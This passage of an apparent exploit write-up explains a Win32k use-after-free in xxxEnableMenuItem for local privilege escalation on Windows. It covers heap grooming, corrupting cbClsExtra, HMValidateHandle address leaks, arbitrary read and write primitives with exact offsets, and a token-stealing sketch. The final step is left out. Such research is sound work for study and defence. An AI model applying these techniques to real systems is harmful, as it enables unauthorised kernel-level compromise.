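    memcpy(out + PAYLOAD_SIZE - 1 - tail, suffix, tail);
    out[PAYLOAD_SIZE - 1] = '\0';
}
```

Each call with a different index produces a distinct string of the same length, which is what a spray of class registrations needs.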
In the image below, you can see the result: all previously created holes and the freed tagMENU have been successfully reclaimed with controlled lpszAnsiClassName strings from different tagCLS instances:
In the image below, you can see the code responsible for reclaiming the freed tagMENU chunk with our controlled data.
And here’s the result.
The memory dump below shows the reclaimed object sitting exactly where tagMENU was previously located.
You might recognize this from the debugging section near the beginning of the write-up. It’s a similar overwritten memory dump to the one we saw after the user-mode callback triggered the free:
That wraps up everything related to heap feng shui and precise memory layout control.
R/W
The final goal of this exploit is to elevate privileges. There are several ways to achieve this, but in this write-up, we’ll use one of the classic techniques: Token Stealing. In simple terms, we want to replace the _TOKEN in the _EPROCESS structure of our current process with the one from the System process (PID 4). This results in our process inheriting the full privileges of the System process.
Notice the semantics of the operation: it’s a replacement.
And replacement can be decomposed into two fundamental operations:
- Read: read the _TOKEN pointer from the System _EPROCESS
- Write: write that pointer into our own process’s _EPROCESS structure
In this section, we will construct the read and write primitives — the fundamental building blocks of our exploit.
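Expressed in code, the replacement is just one read followed by one write. The sketch below assumes the primitives already exist and takes them as function pointers; the fake memory array only exists so the logic can be exercised in user mode. The token offset is build-specific and is left as a parameter rather than hard-coded.

```c
#include <stddef.h>
#include <stdint.h>

/* Primitive signatures; how they are built is the subject of this section. */
typedef uint64_t (*read64_fn)(uint64_t addr);
typedef void     (*write64_fn)(uint64_t addr, uint64_t value);

/*
 * Copy the token pointer from the System _EPROCESS into ours.
 * token_offset is build-specific and must be supplied by the caller.
 */
static void steal_token(read64_fn rd, write64_fn wr,
                        uint64_t system_eprocess, uint64_t own_eprocess,
                        uint64_t token_offset)
{
    uint64_t token = rd(system_eprocess + token_offset); /* Read  */
    wr(own_eprocess + token_offset, token);              /* Write */
}

/* Tiny fake "kernel memory" so the sketch can be exercised in user mode. */
static uint64_t g_mem[64];
static uint64_t fake_read64(uint64_t addr)              { return g_mem[addr / 8]; }
static void     fake_write64(uint64_t addr, uint64_t v) { g_mem[addr / 8] = v; }
```

Keeping the primitives behind two function pointers means the same steal_token logic works no matter how the read and write are eventually implemented.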
Trick the system
To achieve write capabilities, we’ll once again rely on familiar Win32k objects: tagCLS and tagWND.
The tagCLS structure contains a particularly interesting field called cbClsExtra. This field defines how many extra bytes are reserved after the tagCLS object in memory. This extra space is intended to allow third-party applications to store custom data.
Windows exposes two APIs for accessing this area:
- GetClassLongPtr
- SetClassLongPtr
These functions allow user-mode applications to read from and write to the memory immediately following the tagCLS object, based on the value of cbClsExtra.
If we manage to manipulate cbClsExtra, we can trick the system into thinking there’s a large amount of extra memory after the object. From there, it’s straightforward to use SetClassLongPtr to perform out-of-bounds writes well beyond the original object boundary, giving us a powerful and flexible write primitive.
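The effect of a corrupted cbClsExtra can be modeled in a few lines. This is a hypothetical model, not Win32k code: FakeClass and set_class_qword are made-up names, and the bounds check only approximates what a SetClassLongPtr-like API would verify before writing.

```c
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical model of a class object and the memory right after it. */
typedef struct FakeClass {
    int32_t cb_cls_extra; /* how many extra bytes the class claims to own */
    uint8_t mem[16];      /* [0,8) real extra bytes, [8,16) the next object */
} FakeClass;

/* Mimics the bounds check a SetClassLongPtr-like API would perform. */
static bool set_class_qword(FakeClass *c, int32_t index, uint64_t value)
{
    if (index < 0 || (int64_t)index + (int64_t)sizeof value > c->cb_cls_extra)
        return false; /* rejected: outside the claimed extra area */
    if ((size_t)index + sizeof value > sizeof c->mem)
        return false; /* model limit only, not part of the real check */
    memcpy(c->mem + index, &value, sizeof value);
    return true;
}
```

With cb_cls_extra equal to 8, a write at index 8 is rejected. Once the field has been inflated, the same call passes the check and lands in memory that belongs to the neighboring object.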
So how do we actually trigger the use of the freed object?
We use the vulnerable code as designed: after the execution flow returns from user-mode (where the object was freed and replaced), the kernel continues using the original pointer — now pointing to a fully controlled fake object.
This is the last crucial piece of the puzzle.
At the end of xxxEnableMenuItem, the (now stale) object is passed as an argument to the MNGetPopupFromMenu function. This function searches for a corresponding tagPOPUPMENU structure by walking two linked lists stored in the tagMENUSTATE (tagMENUSTATE is stored in UserThreadInfo, which is reachable through the tagWND that is the parent of the target tagMENU). If the search succeeds, the function returns a pointer to a tagPOPUPMENU instance.
After returning from MNGetPopupFromMenu, the object it returns is passed back to xxxEnableMenuItem, and from there it is forwarded as the first argument to the xxxMNUpdateShownMenu function.
Inside xxxMNUpdateShownMenu, only two fields of the returned object are accessed:
- spwndPopupMenu
- spmenu
Both are read-only at this stage. The spwndPopupMenu field is passed down to xxxScrollWindowEx and xxxInvalidateRect.
xxxScrollWindowEx doesn’t modify anything in spwndPopupMenu, and it eventually reaches the same sink as xxxInvalidateRect: a call to xxxRedrawWindow.
And now comes the crucial part.
Inside xxxRedrawWindow, the spwndPopupMenu object is written to. A bitwise OR operation with the constant 02h is performed at offset +0x120 into the structure.
Here is the relevant disassembly:
And the corresponding pseudocode:
This gives us exactly what we need.
By crafting the fake object such that the spwndPopupMenu field points to the cbClsExtra field in our target tagCLS structure, we can cause the system to OR that value with 02h. As a result, cbClsExtra becomes larger than it originally was.
And that gives us what we want: the ability to use SetClassLongPtr to write well beyond the original bounds of the tagCLS structure, turning it into a write primitive. It’s not yet a fully arbitrary write, but we’ll address that in the next step.
To set the field_120 pointer (used in the write operation) to point to the cbClsExtra field in our fake tagCLS object, we first need to know its kernel address. Without it, we can’t correctly position the write or extend our primitive.
To solve this, we’ll use a well-known but effective technique based on the internal Win32k function HMValidateHandle.
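The write-up does not spell out how HMValidateHandle is located. A commonly described public approach, stated here as an assumption, is to scan the start of an exported user32 function such as IsMenu for its first `call rel32` instruction and resolve the target. The resolving arithmetic is shown below on a plain byte buffer; the function name is hypothetical, and a naive byte scan can be fooled by an E8 byte that is part of another instruction.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/*
 * Find the first `call rel32` (opcode E8) in a code buffer and return the
 * absolute target, or 0 if none is found. `base` is the address the buffer
 * was read from.
 */
static uint64_t first_call_target(const uint8_t *code, size_t len, uint64_t base)
{
    for (size_t i = 0; i + 5 <= len; i++) {
        if (code[i] != 0xE8)
            continue;
        int32_t rel;
        memcpy(&rel, code + i + 1, sizeof rel);
        /* target = address of the next instruction + signed displacement */
        return base + i + 5 + (uint64_t)(int64_t)rel;
    }
    return 0;
}
```

The same arithmetic can be checked against the debugger output earlier in the article: the bytes e8 01 01 00 00 at fffffac7`010196ae resolve to fffffac7`010197b4, which is where WinDbg places MenuItemState.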
Now it’s time to turn our relative write primitive into a fully arbitrary write.
To do this, we want to create a specific memory layout on the Desktop Heap:
- A tagCLS object (we’ll call it the Manager) placed between two tagWND objects
- The left tagWND becomes our LeftGuard
- The right tagWND becomes our RightGuard
In order to achieve that we will do the follwing things.
1. Create a tagCLS that we’ll use to create tagWND objects. We’ll refer to this class as GuardClass.
2. Allocate 256 tagWND objects using CreateWindowEx and the GuardClass. These windows will populate the heap and help us find sequential placements.
3. Find three tagWND objects that are allocated sequentially in memory. To verify whether they occupy adjacent memory chunks, we use the HMValidateHandle technique. This allows us to leak the kernel addresses of the tagWND instances and check if they are placed contiguously in the Desktop Heap.
   - The first will become the LeftGuard
   - The third will become the RightGuard
   - The second one is freed using DestroyWindow, creating a hole
4. Create a new tagCLS, with a size equal to that of the previously released tagWND. This new class will be allocated into the hole, and becomes our Manager.
5. Release all unused tagWND windows from step 2, keeping only the LeftGuard and RightGuard.
6. Create a new tagWND using the class associated with the Manager. This new window gives us a handle we can use with SetClassLongPtr, tied to the tagCLS in the middle. We’ll refer to this final window as WND Manager.
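The adjacency check in step 3 can be modelled offline as plain arithmetic on leaked addresses. The sketch below is only an illustration on made-up data: the function name find_sequential_triple, the (handle, address) pairs and the chunk_size value are all hypothetical, and it assumes that "sequential" means the addresses differ by exactly one fixed chunk size.

```python
from typing import List, Optional, Tuple


def find_sequential_triple(
    windows: List[Tuple[int, int]], chunk_size: int
) -> Optional[Tuple[int, int, int]]:
    """Return the handles (left, middle, right) of the first three windows
    whose addresses are exactly chunk_size apart, or None if no such run exists.

    windows is a list of (handle, leaked_address) pairs (hypothetical data).
    """
    by_addr = sorted(windows, key=lambda w: w[1])
    for (h0, a0), (h1, a1), (h2, a2) in zip(by_addr, by_addr[1:], by_addr[2:]):
        if a1 - a0 == chunk_size and a2 - a1 == chunk_size:
            return h0, h1, h2
    return None


# Made-up (handle, address) pairs; real values would come from the leak.
leaked = [
    (0x10, 0x1000),
    (0x11, 0x1400),
    (0x12, 0x1200),
    (0x13, 0x1800),
    (0x14, 0x1600),
    (0x15, 0x2400),
]
triple = find_sequential_triple(leaked, chunk_size=0x200)
```

In this model the middle handle of the returned triple is the window that would be destroyed to create the hole, and the outer two play the roles of LeftGuard and RightGuard.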
The tagWND size must be greater than 90h bytes (this can be achieved via the cbWndExtra field of GuardClass). This is critical because we will later use this region to bypass some internal checks in Win32k when finalizing the write primitive.
The value that we should place in spwndPopupMenu is VA-of-Manager + 63h - 120h:
- 60h because this is the offset of cbClsExtra
- 03h because we want to modify the most significant byte of the stored dword
- 120h because it is the offset to field_120
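The arithmetic above can be checked with a small model. This is a sketch under stated assumptions, not the exploit itself: the offsets 60h, 03h and 120h come from the text, while the helper names, the placeholder address and the starting cbClsExtra value of 10h are hypothetical. It also assumes the OR ends up modifying the single byte at the computed address, which on a little-endian dword is the most significant byte.

```python
import struct

CB_CLS_EXTRA_OFFSET = 0x60  # offset of cbClsExtra in tagCLS, per the text
FIELD_120_OFFSET = 0x120    # offset written to in xxxRedrawWindow, per the text
HIGH_BYTE = 0x03            # index of the most significant byte of a little-endian dword


def fake_spwnd_value(manager_va: int) -> int:
    """Value to store in the fake spwndPopupMenu field (hypothetical helper)."""
    return manager_va + CB_CLS_EXTRA_OFFSET + HIGH_BYTE - FIELD_120_OFFSET


def or_high_byte(cb_cls_extra: int) -> int:
    """Model the effect of OR-ing 02h into the top byte of a 32-bit value."""
    raw = bytearray(struct.pack("<I", cb_cls_extra))
    raw[HIGH_BYTE] |= 0x02
    return struct.unpack("<I", bytes(raw))[0]


manager_va = 0x1000  # placeholder address, not a real kernel pointer
ptr = fake_spwnd_value(manager_va)

# Adding the 120h offset back lands on byte 3 of cbClsExtra.
landing = ptr + FIELD_120_OFFSET

# A small original size becomes a very large one after the OR.
enlarged = or_high_byte(0x10)
print(hex(ptr), hex(landing), hex(enlarged))
```

Targeting the top byte rather than the lowest one is what makes the change significant: setting bit 1 of byte 3 adds 02000000h to the size, whereas the same OR on byte 0 would add at most 2.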
Now it’s time to prepare the fake object that will allow us to overwrite the cbClsExtra field in our Manager.
The memory once occupied by the original tagMENU is now replaced with controlled data.
We control this memory via the lpszAnsiClassName field of a tagCLS, as explained in the Heap Feng Shui section.
Now we are ready to move on and build the final primitives.
Arbitrary Read
We’ll start by implementing the read primitive, since it will be used later in our arbitrary write.
This primitive leverages the GetMenuBarInfo API in combination with our RightGuard window. When called with OBJID_MENU (value -3), GetMenuBarInfo retrieves information about the menu attached to a window (specifically a tagWND).
Internally, GetMenuBarInfo is backed by xxxGetMenuBarInfo, and it reads from the rgItems field of the associated tagMENU object. The pointer to this tagMENU comes from the spmenu field inside tagWND.
Because we already have a relative read/write via our Manager, we can modify the spmenu field in RightGuard to point to a fake tagMENU structure under our control. This allows us to trick GetMenuBarInfo into reading from an arbitrary address.
The implementation of this technique is shown in the image below.
Arbitrary Write
To implement the arbitrary write, we use the same relative read/write primitive from the Manager to modify the pcls pointer in RightGuard, pointing it to a fake tagCLS under our control.
We then call SetClassLongPtr on RightGuard, which operates on this fake structure. Internally, Win32k uses the pclsClone field of tagCLS to compute the destination address.
As seen in the pseudocode, the fake pclsClone pointer should be set to VA-of-WriteTarget - A0h, where A0h is the offset of the _extra field. The write occurs in a loop, and the field at offset 00h (the next pointer) must be zero, or the loop will continue and likely cause a crash or corrupt other memory.
To satisfy the condition in SetClassLongPtr, we use our read primitive to check if the target address (VA-of-WriteTarget - 0xA0) points to a zeroed memory region. If it doesn’t, we adjust our fake pclsClone pointer backwards until we find an address that does point to zero. This avoids triggering the linked list loop inside SetClassLongPtr.
To compensate for the new offset, we use the second parameter of SetClassLongPtr, which acts as an index (the index value is the local variable named offset in the pseudocode above).
This index is added internally to calculate the final write offset, so it allows us to land exactly on the original target, even if the base pointer was shifted.
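The base and index bookkeeping can be modelled on simulated memory. The sketch below is only an arithmetic illustration: pick_base_and_index and read_qword are hypothetical names, the memory is a plain dictionary standing in for the read primitive, and stepping backwards in 8-byte units is an assumption that the text does not specify.

```python
EXTRA_OFFSET = 0xA0  # offset of the _extra field, per the text
STEP = 8             # assumed step size when moving the base backwards


def pick_base_and_index(read_qword, write_target, max_steps=0x100):
    """Find a base whose first qword is zero and the index that compensates.

    read_qword is a callable standing in for the read primitive (hypothetical).
    Returns (base, index) such that base + EXTRA_OFFSET + index == write_target.
    """
    base = write_target - EXTRA_OFFSET
    for _ in range(max_steps):
        if read_qword(base) == 0:
            index = write_target - (base + EXTRA_OFFSET)
            return base, index
        base -= STEP
    raise RuntimeError("no zeroed qword found within max_steps")


# Simulated memory: the first two candidate bases hold non-zero values.
target = 0x5000
memory = {
    target - 0xA0: 0x4141414141414141,
    target - 0xA8: 0x4242424242424242,
    target - 0xB0: 0x0,
}
base, index = pick_base_and_index(lambda addr: memory.get(addr, 0xDEAD), target)
print(hex(base), hex(index))
```

In this model every step backwards increases the index by the same amount, so the sum of base, A0h and index always equals the original target.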
At the end, we should not forget to restore the original tagCLS pointer.
Conclusions
I hope I managed to explain the full exploitation process in a clear and structured way. If you have any questions, feel free to reach out — I’m happy to answer or discuss further.
We intentionally left out the final step — the actual token stealing implementation. It’s not very complicated, and if you’ve followed the write-up this far, consider it a practical exercise for the reader.